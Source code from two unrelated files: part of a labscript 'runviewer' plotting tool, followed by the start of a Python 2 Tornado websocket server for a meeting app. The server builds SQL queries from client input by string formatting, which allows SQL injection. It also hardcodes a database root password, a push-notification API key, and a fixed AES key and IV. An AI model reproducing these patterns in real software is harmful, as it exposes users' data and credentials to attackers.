# x_data_slice = data_x[(data_x>=xmin)&(data_x<=xmax)]
# print len(data_x)
# if len(x_data_slice) < 3*2000+2:
# x_out = x_data_slice
# y_out = data_y[(data_x>=xmin)&(data_x<=xmax)][:-1]
# logger.info('skipping resampling')
# else:
resampling = True
if resampling:
_resample(data_x, data_y, x_out, y_out, numpy.float64(stop_time))
# self.__resample4(data_x, data_y, x_out, y_out, numpy.float32(stop_time))
else:
x_out, y_out = data_x, data_y
return x_out, y_out
def __resample4(self, x_in, y_in, x_out, y_out, stop_time):
# we want x-out to have three times the number of points as there are pixels
# Plus one at the end
# y_out = numpy.empty(len(x_out)-1, dtype=numpy.float64)
# print 'len x_out: %d'%len(x_out)
# A couple of special cases that I don't want to have to put extra checks in for:
if x_out[-1] < x_in[0] or x_out[0] > stop_time:
# We're all the way to the left of the data or all the way to the right. Fill with NaNs:
y_out.fill('NaN')
elif x_out[0] > x_in[-1]:
# We're after the final clock tick, but before stop_time
i = 0
while i < len(x_out) - 1:
if x_out[i] < stop_time:
y_out[i] = y_in[-1]
else:
y_out[i] = numpy.float('NaN')
i += 1
else:
i = 0
j = 1
# Until we get to the data, fill the output array with NaNs (which
# get ignored when plotted)
while x_out[i] < x_in[0]:
y_out[i] = numpy.float('NaN')
y_out[i + 1] = numpy.float('NaN')
y_out[i + 2] = numpy.float('NaN')
i += 3
# If we're some way into the data, we need to skip ahead to where
# we want to get the first datapoint from:
while x_in[j] < x_out[i]:
j += 1
# Get the first datapoint:
# y_out[i] = y_in[j-1]
# i += 1
# Get values until we get to the end of the data:
while j < len(x_in) and i < len(x_out) - 2: # Leave one spare for the final data point and one because stepMode=True requires len(y)=len(x)-1
# This is 'nearest neighbour on the left' interpolation. It's
# what we want if none of the source values checked in the
# upcoming loop are used:
y_out[i] = y_in[j - 1]
i += 2
positive_jump_value = 0
positive_jump_index = j - 1
negative_jump_value = 0
negative_jump_index = j - 1
# now find the max and min values between this x_out time point and the next x_out timepoint
# print i
while j < len(x_in) and x_in[j] < x_out[i]:
jump = y_in[j] - y_out[i - 2]
# would using this source value cause a bigger positive jump?
if jump > 0 and jump > positive_jump_value:
positive_jump_value = jump
positive_jump_index = j
# would using this source value cause a bigger negative jump?
elif jump < 0 and jump < negative_jump_value:
negative_jump_value = jump
negative_jump_index = j
j += 1
if positive_jump_index < negative_jump_index:
y_out[i - 1] = y_in[positive_jump_index]
y_out[i] = y_in[negative_jump_index]
# TODO: We could override the x_out values with x_in[jump_index]
else:
y_out[i - 1] = y_in[negative_jump_index]
y_out[i] = y_in[positive_jump_index]
i += 1
# Get the last datapoint:
if j < len(x_in):
# If the sample rate of the raw data is low, then the current
# j point could be outside the current plot view range
# If so, decrease j so that we take a value that is within the
# plot view range.
if x_in[j] > x_out[-1] and j > 0:
j -= 1
y_out[i] = y_in[j]
i += 1
# if i < len(x_out):
# y_out[i] = y_in[-1]
# i += 1
# Fill the remainder of the array with the last datapoint,
# if t < stop_time, and then NaNs after that:
while i < len(x_out) - 1:
if x_out[i] < stop_time:
y_out[i] = y_in[-1]
else:
y_out[i] = numpy.float('NaN')
i += 1
# return y_out # method changed to modify y_out array in place
def __resample3(self, x_in, y_in, x_out, stop_time):
"""This is a Python implementation of the C extension. For
debugging and developing the C extension."""
y_out = numpy.empty(len(x_out))
i = 0
j = 1
# A couple of special cases that I don't want to have to put extra checks in for:
if x_out[-1] < x_in[0] or x_out[0] > stop_time:
# We're all the way to the left of the data or all the way to the right. Fill with NaNs:
while i < len(x_out):
y_out[i] = numpy.float('NaN')
i += 1
elif x_out[0] > x_in[-1]:
# We're after the final clock tick, but before stop_time
while i < len(x_out):
if x_out[i] < stop_time:
y_out[i] = y_in[-1]
else:
y_out[i] = numpy.float('NaN')
i += 1
else:
# Until we get to the data, fill the output array with NaNs (which
# get ignored when plotted)
while x_out[i] < x_in[0]:
y_out[i] = numpy.float('NaN')
i += 1
# If we're some way into the data, we need to skip ahead to where
# we want to get the first datapoint from:
while x_in[j] < x_out[i]:
j += 1
# Get the first datapoint:
y_out[i] = y_in[j - 1]
i += 1
# Get values until we get to the end of the data:
while j < len(x_in) and i < len(x_out):
# This is 'nearest neighbour on the left' interpolation. It's
# what we want if none of the source values checked in the
# upcoming loop are used:
y_out[i] = y_in[j - 1]
while j < len(x_in) and x_in[j] < x_out[i]:
# Would using this source value cause the interpolated values
# to make a bigger jump?
if numpy.abs(y_in[j] - y_out[i - 1]) > numpy.abs(y_out[i] - y_out[i - 1]):
# If so, use this source value:
y_out[i] = y_in[j]
j += 1
i += 1
# Get the last datapoint:
if i < len(x_out):
y_out[i] = y_in[-1]
i += 1
# Fill the remainder of the array with the last datapoint,
# if t < stop_time, and then NaNs after that:
while i < len(x_out):
if x_out[i] < stop_time:
y_out[i] = y_in[-1]
else:
y_out[i] = numpy.float('NaN')
i += 1
return y_out
def _resample_thread(self):
logger = logging.getLogger('runviewer.resample_thread')
while True:
if self._resample:
self._resample = False
# print 'resampling'
ticked_shots = inmain(self.get_selected_shots_and_colours)
for shot, (colour, shutters_checked) in ticked_shots.items():
for channel in shot.traces:
if self.channel_checked_and_enabled(channel):
try:
xmin, xmax, dx = self._get_resample_params(channel, shot)
# We go a bit outside the visible range so that scrolling
# doesn't immediately go off the edge of the data, and the
# next resampling might have time to fill in more data before
# the user sees any empty space.
if self.scale_time:
xnew, ynew = self.resample(shot.scaled_times(channel), shot.traces[channel][1], xmin, xmax, shot.stop_time, dx)
else:
xnew, ynew = self.resample(shot.traces[channel][0], shot.traces[channel][1], xmin, xmax, shot.stop_time, dx)
inmain(self.plot_items[channel][shot].setData, xnew, ynew, pen=pg.mkPen(QColor(colour), width=2), stepMode=True)
except Exception:
#self._resample = True
pass
else:
logger.info('ignoring channel %s' % channel)
time.sleep(0.5)
@inmain_decorator(wait_for_return=True)
def channel_checked_and_enabled(self, channel):
logger.info('is channel %s enabled' % channel)
index = self.channel_model.index(0, CHANNEL_MODEL__CHANNEL_INDEX)
indexes = self.channel_model.match(index, Qt.DisplayRole, channel, 1, Qt.MatchExactly)
logger.info('number of matches %d' % len(indexes))
if len(indexes) == 1:
check_item = self.channel_model.itemFromIndex(indexes[0])
if check_item.checkState() == Qt.Checked and check_item.isEnabled():
return True
return False
def on_x_axis_reset(self):
ticked_shots = self.get_selected_shots_and_colours()
largest_stop_time = 0
stop_time_set = False
for shot in ticked_shots.keys():
if self.scale_time:
st = self.scalehandler.get_scaled_time(shot.stop_time)
else:
st = shot.stop_time
if st > largest_stop_time:
largest_stop_time = st
stop_time_set = True
if not stop_time_set:
largest_stop_time = 1.0
# Update the range of the link plot
self._hidden_plot[1].setData([0, largest_stop_time], [0, 1e-9])
self._hidden_plot[0].enableAutoRange(axis=pg.ViewBox.XAxis)
def on_y_axes_reset(self):
for plot_widget in self.plot_widgets.values():
plot_widget.enableAutoRange(axis=pg.ViewBox.YAxis)
def _enable_selected_shots(self):
self.update_ticks_of_selected_shots(Qt.Checked)
def _disable_selected_shots(self):
self.update_ticks_of_selected_shots(Qt.Unchecked)
def update_ticks_of_selected_shots(self, state):
# Get the selection model from the treeview
selection_model = self.ui.shot_treeview.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in sorted(selection_model.selectedRows())]
# for each row selected
for row in selected_row_list:
check_item = self.shot_model.item(row, SHOT_MODEL__CHECKBOX_INDEX)
check_item.setCheckState(state)
def _move_up(self):
# Get the selection model from the treeview
selection_model = self.ui.channel_treeview.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in sorted(selection_model.selectedRows())]
# For each row selected
for i, row in enumerate(selected_row_list):
# only move the row if it is not element 0, and the row above it is not selected
# (note that while a row above may have been initially selected, it should by now, be one row higher
# since we start moving elements of the list upwards starting from the lowest index)
if row > 0 and (row - 1) not in selected_row_list:
# Remove the selected row
items = self.channel_model.takeRow(row)
# Add the selected row into a position one above
self.channel_model.insertRow(row - 1, items)
# Since it is now a newly inserted row, select it again
selection_model.select(self.channel_model.indexFromItem(items[0]), QItemSelectionModel.SelectCurrent)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] -= 1
self.update_plot_positions()
def _move_down(self):
# Get the selection model from the treeview
selection_model = self.ui.channel_treeview.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in reversed(sorted(selection_model.selectedRows()))]
# For each row selected
for i, row in enumerate(selected_row_list):
# only move the row if it is not the last element, and the row above it is not selected
# (note that while a row below may have been initially selected, it should by now, be one row lower
# since we start moving elements of the list upwards starting from the highest index)
if row < self.channel_model.rowCount() - 1 and (row + 1) not in selected_row_list:
# Remove the selected row
items = self.channel_model.takeRow(row)
# Add the selected row into a position one above
self.channel_model.insertRow(row + 1, items)
# Since it is now a newly inserted row, select it again
selection_model.select(self.channel_model.indexFromItem(items[0]), QItemSelectionModel.SelectCurrent)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] += 1
self.update_plot_positions()
def _move_top(self):
# Get the selection model from the treeview
selection_model = self.ui.channel_treeview.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in sorted(selection_model.selectedRows())]
# For each row selected
for i, row in enumerate(selected_row_list):
# only move the row while it is not element 0, and the row above it is not selected
# (note that while a row above may have been initially selected, it should by now, be one row higher
# since we start moving elements of the list upwards starting from the lowest index)
while row > 0 and (row - 1) not in selected_row_list:
# Remove the selected row
items = self.channel_model.takeRow(row)
# Add the selected row into a position one above
self.channel_model.insertRow(row - 1, items)
# Since it is now a newly inserted row, select it again
selection_model.select(self.channel_model.indexFromItem(items[0]), QItemSelectionModel.SelectCurrent)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] -= 1
row -= 1
self.update_plot_positions()
def _move_bottom(self):
selection_model = self.ui.channel_treeview.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in reversed(sorted(selection_model.selectedRows()))]
# For each row selected
for i, row in enumerate(selected_row_list):
# only move the row while it is not the last element, and the row above it is not selected
# (note that while a row below may have been initially selected, it should by now, be one row lower
# since we start moving elements of the list upwards starting from the highest index)
while row < self.channel_model.rowCount() - 1 and (row + 1) not in selected_row_list:
# Remove the selected row
items = self.channel_model.takeRow(row)
# Add the selected row into a position one above
self.channel_model.insertRow(row + 1, items)
# Since it is now a newly inserted row, select it again
selection_model.select(self.channel_model.indexFromItem(items[0]), QItemSelectionModel.SelectCurrent)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] += 1
row += 1
self.update_plot_positions()
def update_plot_positions(self):
# remove all widgets
layout_items = {}
for i in range(self.ui.plot_layout.count()):
if i == 0:
continue
item = self.ui.plot_layout.takeAt(i)
# add all widgets
for i in range(self.channel_model.rowCount()):
check_item = self.channel_model.item(i, CHANNEL_MODEL__CHECKBOX_INDEX)
channel = str(check_item.text())
if channel in self.plot_widgets:
self.ui.plot_layout.addWidget(self.plot_widgets[channel])
if check_item.checkState() == Qt.Checked and check_item.isEnabled():
self.plot_widgets[channel].show()
else:
self.plot_widgets[channel].hide()
self.ui.plot_layout.addWidget(self._time_axis_plot[0])
class Shot(object):
def __init__(self, path):
self.path = path
# Store list of traces
self._traces = None
# store list of channels
self._channels = None
# store list of markers
self._markers = None
self.cached_scaler = None
self._scalehandler = None
self._scaled_x = {}
# store list of shutter changes and callibrations
self._shutter_times = None
self._shutter_calibrations = {}
# TODO: Get this dynamically
device_list = ['PulseBlaster', 'NI_PCIe_6363', 'NI_PCI_6733']
# Load connection table
self.connection_table = ConnectionTable(path)
# open h5 file
with h5py.File(path, 'r') as file:
# Get master pseudoclock
self.master_pseudoclock_name = file['connection table'].attrs['master_pseudoclock']
if isinstance(self.master_pseudoclock_name, bytes):
self.master_pseudoclock_name = self.master_pseudoclock_name.decode('utf8')
else:
self.master_pseudoclock_name = str(self.master_pseudoclock_name)
# get stop time
self.stop_time = file['devices'][self.master_pseudoclock_name].attrs['stop_time']
self.device_names = list(file['devices'].keys())
# Get Shutter Calibrations
if 'calibrations' in file and 'Shutter' in file['calibrations']:
for name, open_delay, close_delay in numpy.array(file['calibrations']['Shutter']):
name = name.decode('utf8') if isinstance(name, bytes) else str(name)
self._shutter_calibrations[name] = [open_delay, close_delay]
def delete_cache(self):
self._channels = None
self._traces = None
def _load(self):
if self._channels is None:
self._channels = {}
if self._traces is None:
self._traces = {}
if self._markers is None:
self._markers = {}
if self._shutter_times is None:
self._shutter_times = {}
self._load_markers()
# Let's walk the connection table, starting with the master pseudoclock
master_pseudoclock_device = self.connection_table.find_by_name(self.master_pseudoclock_name)
self._load_device(master_pseudoclock_device)
# self._scalehandler = ScaleHandler(self._markers.keys(), self.stop_time)
def _load_markers(self):
with h5py.File(self.path, 'r') as file:
if "time_markers" in file:
for row in file["time_markers"]:
self._markers[row['time']] = {'color': row['color'].tolist()[0], 'label': row['label']}
elif "runviewer" in file:
for time, val in file["runviewer"]["markers"].attrs.items():
props = val.strip('{}}').rsplit(",", 1)
color = list(map(int, props[0].split(":")[1].strip(" ()").split(",")))
label = props[1].split(":")[1]
self._markers[float(time)] = {'color': color, 'label': label}
if 0 not in self._markers:
self._markers[0] = {'color': [0,0,0], 'label': 'Start'}
if self.stop_time not in self._markers:
self._markers[self.stop_time] = {'color': [0,0,0], 'label' : 'End'}
def add_trace(self, name, trace, parent_device_name, connection):
name = str(name)
self._channels[name] = {'device_name': parent_device_name, 'port': connection}
self._traces[name] = trace
# add shutter times
con = self.connection_table.find_by_name(name)
if con.device_class == "Shutter" and 'open_state' in con.properties:
self.add_shutter_times([(name, con.properties['open_state'])])
# Temporary solution to physical shutter times
def add_shutter_times(self, shutters):
for name, open_state in shutters:
x_values, y_values = self._traces[name]
if len(x_values) > 0:
change_indices = numpy.where(y_values[:-1] != y_values[1:])[0]
change_indices += 1 # use the index of the value that is changed to
change_values = list(zip(x_values[change_indices], y_values[change_indices]))
change_values.insert(0, (x_values[0], y_values[0])) # insert first value
self._shutter_times[name] = {x_value + (self._shutter_calibrations[name][0] if y_value == open_state else self._shutter_calibrations[name][1]): 1 if y_value == open_state else 0 for x_value, y_value in change_values}
def _load_device(self, device, clock=None):
try:
print('loading %s' % device.name)
module = device.device_class
# Load the master pseudoclock class
# labscript_devices.import_device(module)
device_class = labscript_devices.get_runviewer_parser(module)
device_instance = device_class(self.path, device)
clocklines_and_triggers = device_instance.get_traces(self.add_trace, clock)
for name, trace in clocklines_and_triggers.items():
child_device = self.connection_table.find_by_name(name)
for grandchild_device_name, grandchild_device in child_device.child_list.items():
self._load_device(grandchild_device, trace)
except Exception:
# TODO: print/log exception traceback
# if device.name == 'ni_card_0' or device.name == 'pulseblaster_0' or device.name == 'pineblaster_0' or device.name == 'ni_card_1' or device.name == 'novatechdds9m_0':
# raise
# raise
if hasattr(device, 'name'):
print('Failed to load device %s' % device.name)
else:
print('Failed to load device (unknown name, device object does not have attribute name)')
# backwards compat
with h5py.File(self.path, 'r') as file:
if "runviewer" in file:
if "shutter_times" in file["runviewer"]:
for name, val in file["runviewer"]["shutter_times"].attrs.items():
self._shutter_times[name] = {float(key_value.split(":")[0]): int(key_value.split(":")[1]) for key_value in val.strip('{}}').split(",")}
def scaled_times(self, channel):
if self.cached_scaler != app.scalehandler:
self.cached_scaler = app.scalehandler
self._scaled_x = {}
if channel not in self._scaled_x:
self._scaled_x[channel] = self.cached_scaler.get_scaled_time(self._traces[channel][0])
return self._scaled_x[channel]
@property
def channels(self):
if self._channels is None:
self._load()
return self._channels.keys()
def clear_cache(self):
# clear cache variables to cut down on memory usage
pass
@property
def markers(self):
if self._markers is None:
self._load()
return self._markers
@property
def traces(self):
# if traces cached:
# return cached traces and waits
if self._traces is None:
self._load()
return self._traces
@property
def shutter_times(self):
if self._shutter_times is None:
self._load()
return self._shutter_times
# @property
# def scalehandler(self):
# if self._scalehandler is None:
# self._load()
# return self._scalehandler
class TempShot(Shot):
def __init__(self, i):
Shot.__init__(self, 'shot %d' % i)
self._channels = ['Bx', 'By', 'Bz', 'Bq']
self.stop_time = i + 1
self.traces = {}
no_x_points = 10000
for channel in self.channels:
# self.traces[channel] = (numpy.linspace(0,10,no_x_points), numpy.random.rand(no_x_points))
x_points = numpy.linspace(0, self.stop_time, no_x_points)
self.traces[channel] = (x_points, (i + 1) * numpy.sin(x_points * numpy.pi + i / 11.0 * 2 * numpy.pi))
@property
def channels(self):
return self._channels
def get_traces(self):
return self.traces
class RunviewerServer(ZMQServer):
def __init__(self, *args, **kwargs):
ZMQServer.__init__(self, *args, **kwargs)
self.logger = logging.getLogger('runviewer.server')
def handler(self, h5_filepath):
if h5_filepath == 'hello':
return 'hello'
self.logger.info('Received hdf5 file: %s' % h5_filepath)
# Convert path to local slashes and shared drive prefix:
h5_filepath = labscript_utils.shared_drive.path_to_local(h5_filepath)
logger.info('local filepath: %s' % h5_filepath)
# we add the shot to a queue so that we don't have to wait for the app to come up before
# responding to runmanager
shots_to_process_queue.put(h5_filepath)
return 'ok'
if __name__ == "__main__":
qapplication = QApplication(sys.argv)
shots_to_process_queue = Queue()
exp_config = LabConfig(required_params = {"DEFAULT": ["experiment_name"], "paths": ["shared_drive", "experiment_shot_storage"], 'ports': ['runviewer']})
port = int(exp_config.get('ports', 'runviewer'))
myappid = 'monashbec.runviewer' # arbitrary string
try:
ctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(myappid)
except:
logger.info('Not on a windows machine')
# Start experiment server
experiment_server = RunviewerServer(port)
app = RunViewer(exp_config)
def execute_program():
qapplication.exec_()
sys.exit(execute_program())
|
meetAppServer.py
|
#!/usr/bin/python
'''
* Copyright (c) 2017.
* Author: Pranjal P. Joshi
* Application: MeetApp
* All rights reserved.
'''
import tornado.httpserver
import tornado.websocket
import tornado.ioloop
import tornado.web
import socket
import os
import json
import time
import sys
import ast
import MySQLdb as mdb
import pymysql.cursors
import threading
import datetime
import base64
from Crypto.Cipher import AES
from pyfcm import FCMNotification
###### Main server #########
##### STATIC_VARIABLES #####
PORT = 80
DEBUG = True
USE_PYMYSQL = False
PUSH_ENABLE = True
SHOW_RAW_MSGS = True
NO_OF_CONNECTIONS = 0
PONG_TIMEOUT = 10 # seconds
CONNECTION_CLOSE_TIMEOUT = 20 # Minutes
DB_NAME = "meetapp_server"
DB_USER = "root"
DB_PASSWD = "linux"
DB_NAME = "meetapp_server"
ANDROID_PACKAGE_NAME = 'com.cyberfox.meetapp'
FCM_KEY = "AAAAR9TOyxc:APA91bHqHw0U9vYdtdU-dOWijZR1lHSZHvIse42udNxWNgPc3syNg3im-fVpRBJE3qgCQq4vgVgwQr4LFugL33Ia4s8YddEyMYo7KDibOuoxl8LehlCHg40okxnIeIuD7ltfXlxZava1"
#### Global variables ####
activeUsers = []
onlineClientsNumbers = []
offlineClientNumbers = []
connectionAlreadyExists = False
replaceCount = 0
### JSON Data ###
push_open = {"pushType":"open"}
### Core functions ###
def initDB():
print "Initializing MySQL database."
db.execute("show databases")
a = db.fetchall()
a = str(a)
if(a.find(DB_NAME) > 0):
print "---> Database found.\n"
else:
print "---> Database not found. creating...\n"
db.execute("create database %s" % DB_NAME)
db.execute("use %s" % DB_NAME)
db.execute("create table registration_table(_id BIGINT NOT NULL AUTO_INCREMENT, registered_number VARCHAR(20) NOT NULL, fcm_token VARCHAR(500) NOT NULL, PRIMARY KEY(_id))")
db.execute("create table store_and_fwd_table(_id BIGINT NOT NULL AUTO_INCREMENT, arrive_timestamp VARCHAR(20), expire_timestamp VARCHAR(20), send_to VARCHAR(15), sent_from VARCHAR(15), message VARCHAR(4000), PRIMARY KEY(_id))")
#con.commit()
def onOpen(msg,socket):
if msg['type'] == "onOpen":
lenghtOfActiveUsers = len(activeUsers)
connectionAlreadyExists = False
for i in range(0,lenghtOfActiveUsers):
if(activeUsers[i].keys()[0] == msg['from']):
tempDict = activeUsers[i]
tempDict[msg['from']] = socket
activeUsers[i] = tempDict
connectionAlreadyExists = True
if DEBUG:
print "Replacing exisiting connection : %s" % phoneNumberFormatter(msg['from'])
break
if(not connectionAlreadyExists):
tempDict = {}
tempDict[msg['from']] = socket
activeUsers.append(tempDict)
if DEBUG:
print "New connection created : %s" % phoneNumberFormatter(msg['from'])
# THIS WILL SYNC DATA ON CONNECTION
checkIfOnline(phoneNumberFormatter(msg['from']))
def onRegisterUserRequest(req):
if req['type'] == "register":
number = str(req['from'])
number = phoneNumberFormatter(number)
fcm_token = str(req['fcm_token'])
db.execute("use meetapp_server")
db.execute("select _id from registration_table where registered_number=%s" % number)
data = db.fetchall()
if not data:
db.execute("insert into registration_table(registered_number, fcm_token) values ('%s','%s')" % (number, fcm_token))
#con.commit()
if DEBUG:
print "New user registered: %s" % number
else:
if DEBUG:
print "User already exists: %s" % number
def onDeleteAccountRequest(req):
if(req['type'] == "deleteAccount"):
number = phoneNumberFormatter(str(req['from']))
fcm_token = str(req['fcm_token'])
db.execute("use meetapp_server")
db.execute("delete from registration_table where registered_number=%s" % number)
#con.commit()
def onUpdateTokenRequest(req):
if req['type'] == "tokenUpdate":
number = str(req['from'])
number = phoneNumberFormatter(number)
token = str(req['fcm_token'])
if number is None:
number = "null"
if token is None:
token = "null"
db.execute("use meetapp_server")
db.execute("update registration_table set fcm_token='%s' where registered_number='%s'" % (token,number))
#con.commit()
if DEBUG:
print "Token Updated. Token: " + token + " From: " + number
def onContactSyncRequest(req, socket):
if req['type'] == "syncRequest":
number = str(req['from'])
total = int(req['total'])
phonebook = req['phonebook']
existingCount = 0
syncedNumbers = {}
db.execute("use meetapp_server")
for i in range(1,total):
checkThisNumber = str(phonebook[str(i)])
checkThisNumber = phoneNumberFormatter(checkThisNumber)
if not (checkThisNumber.find('*') > -1 or checkThisNumber.find('#') > -1):
checkThisNumber = checkThisNumber[-10:]
db.execute("select registered_number from registration_table where registered_number like '%{}%'".format(str(checkThisNumber)))
data = db.fetchone()
if data == None:
pass
else:
if not USE_PYMYSQL:
if not data[0] in syncedNumbers.values(): # avoids duplicating of same number in json resp
if data[0] != number: # don't send syncer's number back to him --> NOT_TESTED <-- Change if ERROR---
existingCount += 1
syncedNumbers.update({str(existingCount):str(data[0])})
else:
if not data['registered_number'] in syncedNumbers.values(): # avoids duplicating of same number in json resp
if data['registered_number'] != number: # don't send syncer's number back to him --> NOT_TESTED <-- Change if ERROR---
existingCount += 1
syncedNumbers.update({str(existingCount):str(data['registered_number'])})
resp = {'from':'server','existingCount':str(existingCount),'type':'syncResponse','syncedNumbers':syncedNumbers}
resp = json.dumps(resp)
if DEBUG:
print resp
socket.write_message(aes.encrypt(resp))
def onTripLocationUpdateReceive(req):
if req['type'] == "locationUpdate":
sender = getFullRegisteredNumberFrom(req['from'])
send_to = getFullRegisteredNumberFrom(req['to'])
req['from'] = "server"
req['sender'] = sender
req['type'] = "locationInfo"
req = json.dumps(req)
for i in range(0,len(activeUsers)):
print activeUsers[i].keys()[0]
if(activeUsers[i].keys()[0] == send_to): # Dont do ping-pong.. send directly to receiver if online
tempDict = activeUsers[i]
socket = tempDict[send_to]
try:
socket.write_message(aes.encrypt(req))
except:
print "WARN: SOCKET_CLOSED"
if DEBUG:
print "Sent locationUpdate to: ", send_to
break
else:
pass
def onTripFinishRequest(req):
if req['type'] == "tripFinish":
sender = getFullRegisteredNumberFrom(req['from'])
send_to = getFullRegisteredNumberFrom(req['to'])
for i in range(0,len(activeUsers)):
print activeUsers[i].keys()[0]
if(activeUsers[i].keys()[0] == send_to): # Dont do ping-pong.. send directly to receiver if online
tempDict = activeUsers[i]
socket = tempDict[send_to]
req = json.dumps(req)
try:
socket.write_message(aes.encrypt(req))
except:
print "WARN: SOCKET_CLOSED"
if DEBUG:
print "Sent locationUpdate to: ", send_to
break
else:
pass
def checkIfOnline(number):
e164Number = number
number = str(number[-10:])
sendPingTo(number)
startWaitForPongThread(number, e164Number)
def onPong(resp,socket):
if(resp['type'] == "pong"):
number = phoneNumberFormatter(str(resp['from']))
for thread in threading.enumerate():
#if thread.name == number:
if(number.find(thread.name) > -1):
thread.run = False
sendToPonger(number,socket)
def sendToPonger(number,socket):
db.execute("use meetapp_server")
db.execute("select _id, message from store_and_fwd_table where send_to='%s'" % number)
results = db.fetchall()
for i in range(0,len(results)):
if USE_PYMYSQL:
_id = results[i]['_id']
msg = results[i]['msg']
else:
_id = results[i][0]
msg = results[i][1]
socket.write_message(aes.encrypt(msg))
db.execute("delete from store_and_fwd_table where _id=%d" % _id)
#con.commit()
if DEBUG:
print "Sending stored messages to ponger: %s" % number
def sendPingTo(number):
lenghtOfActiveUsers = len(activeUsers)
for i in range(0,lenghtOfActiveUsers):
#if(activeUsers[i].keys()[0] == str(number)):
if(activeUsers[i].keys()[0].find(str(number)) > -1):
number = str(activeUsers[i].keys()[0])
tempDict = activeUsers[i]
socket = tempDict[str(number)]
pingFrame = {'from':'server','type':'ping'}
socket.write_message(aes.encrypt(json.dumps(pingFrame)))
if DEBUG:
print "Sent ping to: " + str(number)
def registerAsOffline(number):
if number in offlineClientNumbers:
pass
else:
offlineClientNumbers.append(str(number))
def startWaitForPongThread(number,e164number):
number = str(number)
e164number = str(e164number)
t = threading.Thread(target=waitingThread, name=number, args=(number,e164number,))
t.start()
def waitingThread(number,e164number):
if DEBUG:
print "Started waiting thread for pong from: %s" % number
t = threading.current_thread()
timeCnt = 0
while(timeCnt < PONG_TIMEOUT and getattr(t,'run',True)):
time.sleep(1)
timeCnt += 1
print "TIME_CNT: " + str(timeCnt) + "\tPONG_TIMEOUT: " + str(PONG_TIMEOUT)
if(timeCnt == PONG_TIMEOUT):
registerAsOffline(number)
if PUSH_ENABLE:
pushOpenToDevice(e164number)
if DEBUG:
print "Waiting thread expired - Adding to offline list: %s" % number
else:
if number in offlineClientNumbers:
offlineClientNumbers.remove(number)
if DEBUG:
print "Pong recived from: %s" % number
def onMeetingRequest(req):
if(req['type'] == 'immidiet' or req['type'] == 'scheduled'):
sent_from = phoneNumberFormatter(str(req['from']))
send_to = getFullRegisteredNumberFrom(phoneNumberFormatter(str(req['to'])))
msg = str(req)
now = str(datetime.datetime.now().strftime("%d/%m/%y %I:%M:%S"))
expiry = str(getMsgExpiryDate(datetime.datetime.now()))
db.execute("use meetapp_server")
db.execute("insert into store_and_fwd_table (arrive_timestamp, expire_timestamp, send_to, sent_from, message) values ('%s', '%s', '%s', '%s', \"%s\")" % (now, expiry, send_to, sent_from, msg))
#con.commit()
checkIfOnline(send_to)
def onMeetingRequestResponse(resp):
if(resp['type'] == 'meetingRequestResponse'):
sent_from = phoneNumberFormatter(str(resp['from']))
send_to = getFullRegisteredNumberFrom(phoneNumberFormatter(str(resp['to'])))
msg = str(resp)
msg = ast.literal_eval(msg)
msg['to'] = send_to
msg = json.dumps(msg)
msg = str(msg).replace("\"","\'")
now = str(datetime.datetime.now().strftime("%d/%m/%y %I:%M:%S"))
expiry = str(getMsgExpiryDate(datetime.datetime.now()))
db.execute("use meetapp_server")
db.execute("insert into store_and_fwd_table (arrive_timestamp, expire_timestamp, send_to, sent_from, message) values ('%s', '%s', '%s', '%s', \"%s\")" % (now, expiry, send_to, sent_from, msg))
#con.commit()
checkIfOnline(send_to)
def pushOpenToDevice(number):
fcm_token = getFCMIdOfUser(number)
result = fcm.notify_single_device(registration_id=fcm_token, data_message=push_open, restricted_package_name=ANDROID_PACKAGE_NAME)
if DEBUG:
print "Sent open push to: " + number
##### WebSocketHandler class #####
class WSHandler(tornado.websocket.WebSocketHandler):
def open(self):
global NO_OF_CONNECTIONS
NO_OF_CONNECTIONS += 1
self.timeout = tornado.ioloop.IOLoop.current().add_timeout(datetime.timedelta(minutes=CONNECTION_CLOSE_TIMEOUT), self.timeout_close)
if DEBUG:
print "New connection: " + self.request.remote_ip
print "No of connections: " + str(NO_OF_CONNECTIONS)
def on_message(self,message):
global activeUsers
msg = aes.decrypt(message)
msg = ast.literal_eval(msg)
onOpen(msg,self)
onRegisterUserRequest(msg)
onContactSyncRequest(msg,self)
onPong(msg,self)
onMeetingRequest(msg)
onMeetingRequestResponse(msg)
onTripLocationUpdateReceive(msg)
onTripFinishRequest(msg)
onUpdateTokenRequest(msg)
onDeleteAccountRequest(msg)
if SHOW_RAW_MSGS:
print msg
def on_error(self, error):
print "Websocket error: " + str(error)
self.close()
def on_close(self):
global NO_OF_CONNECTIONS
if NO_OF_CONNECTIONS > 0:
NO_OF_CONNECTIONS -= 1
if DEBUG:
print "No of connections: " + str(NO_OF_CONNECTIONS)
print "Connection closed by " + self.request.remote_ip
def timeout_close(self):
global NO_OF_CONNECTIONS
NO_OF_CONNECTIONS -= 1
if DEBUG:
print "Connection timeout - Closing -->: %s" % self.request.remote_ip
print "No. of open connections: %d" % NO_OF_CONNECTIONS
self.close()
class MeetAppSecurity:
def __init__(self):
self.key = "MeetAppSecretKey"
self.iv = "alohomora2unlock"
self.block_size = AES.block_size
def pad(self,plain_text):
number_of_bytes_to_pad = self.block_size - len(plain_text) % self.block_size
ascii_string = chr(number_of_bytes_to_pad)
padding_str = number_of_bytes_to_pad * ascii_string
padded_plain_text = plain_text + padding_str
return padded_plain_text
def unpad(self,s):
return s[0:-ord(s[-1])]
def encrypt(self,raw):
cipher = AES.new(self.key, AES.MODE_CBC, self.iv)
raw = self.pad(raw)
e = cipher.encrypt(raw)
return base64.b64encode(e)
def decrypt(self,enc):
decipher = AES.new(self.key, AES.MODE_CBC, self.iv)
enc = base64.b64decode(enc)
return self.unpad(decipher.decrypt(enc))
class MeetAppDatabase():
con = None
cursor = None
def connect(self):
self.con = mdb.connect(host="localhost",user=DB_USER,passwd=DB_PASSWD,db=DB_NAME)
self.cursor = self.con.cursor()
def execute(self, query):
try:
self.cursor.execute(query)
self.con.commit()
except (mdb.OperationalError, AttributeError):
print "Database Exception -- Reconnecting..."
self.connect()
self.cursor.execute(query)
self.con.commit()
def fetchone(self):
